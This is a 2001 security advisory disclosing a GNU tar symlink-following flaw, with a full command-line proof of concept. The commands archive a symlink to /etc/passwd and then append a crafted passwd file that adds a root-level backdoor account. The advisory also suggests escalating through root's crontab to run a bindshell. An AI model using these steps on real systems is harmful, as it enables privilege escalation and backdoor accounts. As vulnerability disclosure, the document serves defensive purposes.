Title : GNU tar (Tape ARchive) symlinkvulnerability Author : Marco van Berkum Organisation : OBIT b.v. URL : http://www.obit.nl Email : m.v.berkum@obit.nl Date : 06-01-2001 The usefull program tar (Tape ARchive) is used by all UNIX, Linux and BSD versions around and is used to ARCHIVE files to disk or tape in a easy portable format. While this program has been used for a long time there seemed to be no need to fix the problem of following symlinks in a archive. The problem is that tar follows symlinks without questioning whether this is a file which is harmless or a file such as /etc/passwd. This way it will be possible to overwrite ANY file on the system when untarred as root (NOT DONE). How can this be done? Well, you create a directory as test to see the effect of a tarred symlink % mkdir test % cd test % ln -s /etc/passwd passwd % ls -al total 2 drwx--x--x 2 user user 1024 Aug 7 13:08 ./ drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../ lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd % You now have a symlink to /etc/passwd, next we are going to tar this symlink. % tar -cvf test.tar * % ls -al total 12 drwx--x--x 2 user user 1024 Aug 7 13:11 ./ drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../ lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd -rw------- 1 user user 10240 Aug 7 13:11 test.tar % Lets see whats in the tarfile now % tar -tf test.tar passwd <- AHA a symlink ;) % This is not visible as symlink when you do -tf !! It would be when doing tar -tvf (verbose). So next we remove the symlink from the testdirectory % rm passwd We now have only the tarfile with the symlink to /etc/passwd, next we create our own passwdfile % echo "root:our_password_string:0:0::/root:/bin/bash" >passwd % echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd Ok now whe have a test.tar and a passfile, all we would have to do is simply append the passwordfile to the tarfile. % tar -rf test.tar passwd Now list it % tar -tf test.tar passwd <- AHA a symlink ;) passwd <- our evil passwdfile % Now one can image what happens when this tarfile is extracted as root, it will create a symlink to /etc/passwd and overwrite it with ours. Ofcourse this is possible with all files on the system, one of the most malicious things to do would be overwriting the rootcrontab and execute commands that way. Even programs like bindshell can be executed this way by making a symlink to say /tmp, dump the bindshell binary/source to /tmp and make a rootcrontab pointing to that file by executing or compiling and executing it wich will leave us with a rootshell ;) Solution: Well, obviously one should NEVER untar files as root, but a patch to the tarprogram wich enhances tar by asking wether it should follow symlinks or not would do the trick aswell. grtz, Marco van Berkum -- Sex is like hacking. You get in, you get out, and you hope you didn't leave something behind that can be traced back to you. Marco van Berkum, System Operator/Security Analyst OBIT b.v. RIPEHANDLE: MB17300-RIPE